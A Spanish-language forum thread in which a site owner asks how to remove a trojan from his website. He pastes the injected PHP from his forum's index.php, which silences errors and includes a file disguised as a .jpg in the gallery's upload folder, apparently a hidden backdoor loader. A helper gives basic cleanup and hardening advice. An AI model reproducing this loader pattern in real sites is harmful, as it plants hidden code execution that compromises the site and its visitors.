Tema: Troyano en mi página web

[Schaman]

Gracias otra vez.
Como me dijiste estuve revisando el index en la carpeta del foro pero ahí no aparece lo que veo en el codigo fuente , no sé si es lo normal , como dije no sé mucho de estos temas , lo que me aperece es esto que para colmo enlaza con la galeria ?¿  :

<?php
   error_reporting(0);
   if (file_exists("/web/htdocs/www.davidbustamanteweb.com/home/galeria/albums/userpics/10001/45563131x.jpg")) {
   include("/web/htdocs/www.davidbustamanteweb.com/home/galeria/albums/userpics/10001/45563131x.jpg");
   } else
   if (ini_get("register_globals")) {
      if($GLOBALS["fx"]==0) {
         $GLOBALS["fx"]=1;
         echo "";
      }
   } else {
      echo "";
   }
   ?><?php


Qué tengo que hacer borrar toda esa parte ?
Aunque viendo ese del index.php en mi PC no aparace lo del error reporting y demás , subo eso y la sustiuyo por el del servidor ?
Eso mismo también pasa con la Galeria de la web.
Y otra cosa , qué puedo hacer para proteger la web , donde tengo contratado el servidor-dominio me dicen que sólo tienen antivirus y antispam para el correo.

[Liamngls]

La forma de borrar algo es con un editor de texto o editor de páginas web .... lo suprimes como en cualquier documento de texto y guardas los cambios, luego sustituyes el archivo por el que tienes en el servidor.

La forma de proteger un sitio web es algo compleja, si usas un gestor de contenidos (Joomla!, Wordpress, Drupal, etc) debes de tener siempre la última versión actualizada y andar pendiente de las actualizaciones o parches que se publiquen para evitar que alguien pueda explotar una vulnerabilidad y hacerte alguna "trastada"; la gente del hosting poco puede hacer en ese sentido.

De todas formas siempre es bueno que guardes una copia de lo que vayas a cambiar por si luego no funcionase correctamente poder restaurarlo.

En cualquier caso si incluyes un código en el sitio y quien te proporciona ese código se aprovecha para enviarle publicidad a tus visitantes (o intentar instalarles algo) la cuestión no es de seguridad ya que en ese caso el código malicioso lo habrías incluido tú y no sería cuestión de una vulnerabilidad explotada.

[Schaman]

Uff disculpa pero donde se encuentra lo del sistema de caché ?
En el apartado del foro que hay en el servidor aparece una carpeta con ese nombre , a eso te refieres?

Revisa todos los index donde aparezca y quítalo ..... si la web tiene algún sistema de caché deberás vaciar esa caché para que la gente pueda acceder a la página "nueva" sin ese código.

[Liamngls]

Esa carpeta es, elimina el contenido y listo.